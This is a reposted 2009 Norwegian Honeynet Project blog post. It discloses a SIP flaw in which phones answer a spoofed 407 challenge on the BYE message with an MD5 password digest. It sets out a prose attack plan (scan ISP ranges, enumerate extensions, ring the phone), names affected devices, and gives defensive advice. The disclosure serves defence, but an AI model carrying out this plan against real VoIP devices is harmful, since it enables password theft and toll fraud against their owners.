Honeynet

March 8th, 2010
Goto comments Leave a comment

How to get the password from any SIP user-agent!

Story written by Sjur and originally posted on  March 26th, 2009 on Norwegian Honeynet Project

This is really, really, really bad!
If I know the IP address of your SIP User-Agent and your extension, I can get your password. Not true? Here is how Sandro and I did it! Sandro Gauci also has a tool (voippack for Canvas) which automates the whole process, you can watch the video here!

The master plan:
Check up on the Internet which ISPs are delivering VoIP. Check RIPE for their IP ranges. Scan them for SIP devices.
Get the extensions they are using (or their ranges of usernames (e.g phone numbers, then do brute force on these ranges on each IP)
Send an INVITE to the correct extension and the phone will ring. When the user hangs-up, we have the password.

The details:
We make the phone send a PROXY AUTHENTICATION when the SIP UserAgent sends the BYE message. We answer with “407 Proxy authorization required” and then the SIP UserAgent actually answers this with the password in a MD5 hash.

The problem
The SIP stack is not connected to the IP Stack. Why is the SIP User Agent answering on SIP messages from other IPS than the SIP Registrar it is connected to? There should be automatically a rule saying “all SIP messages from other servers than what I’ve registered to = drop them!”
Why does the User Agent blindly answer a challenge on the BYE message. Just send it a “407″ and the SIP UA answers with the password…

Units tested (and we managed to get the password)
Linksys SPA2102
Grandstream GXV3000 (latest firmware)
AVM Fritz 7270 (firmware December 2008)

The units that will be tested further:
Polycom
Thompson ST2030
Snom

How to protect yourself (for users)
Make sure your VoIP provider has credit limits! You don’t want to get a huge phone bill!
Report any unusual phone calls or strange behavior!

How to protect yourself (for VoIP providers)
Protect your SIP user-agents! This is hard with the Fritz units
which is normally used as a router
Have very long SIP passwords and use all characters that is possible! (#¤%” and others)
Change the SIP password regularly
Run VoIP honeypots to detect scans in your area

How serious do you think this is? Visit The Norwegian Honeynet Project and write your comments now!

  1. No comments yet.
  1. No trackbacks yet.
You must be logged in to post a comment.
WordPress SEO fine-tune by Meta SEO Pack from Poradnik Webmastera